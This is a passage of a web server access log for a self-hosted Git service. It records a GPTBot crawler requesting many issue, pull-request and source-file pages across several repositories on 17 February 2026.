[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&state=closed&type=all" -[17/Feb/2026:18:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10778] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=closed&type=all" -[17/Feb/2026:18:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33357] [Gzip 10.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33385] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33386] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33386] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33384] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11128] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11128] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" -[17/Feb/2026:18:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=closed&type=all" -[17/Feb/2026:18:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11411] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv?display=rendered" [Client 74.7.227.38] [Length 11221] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:18:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fPostgresWatchdog.spec" [Client 74.7.227.38] [Length 20117] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:18:17:11 +0000] - 200 200 - GET https 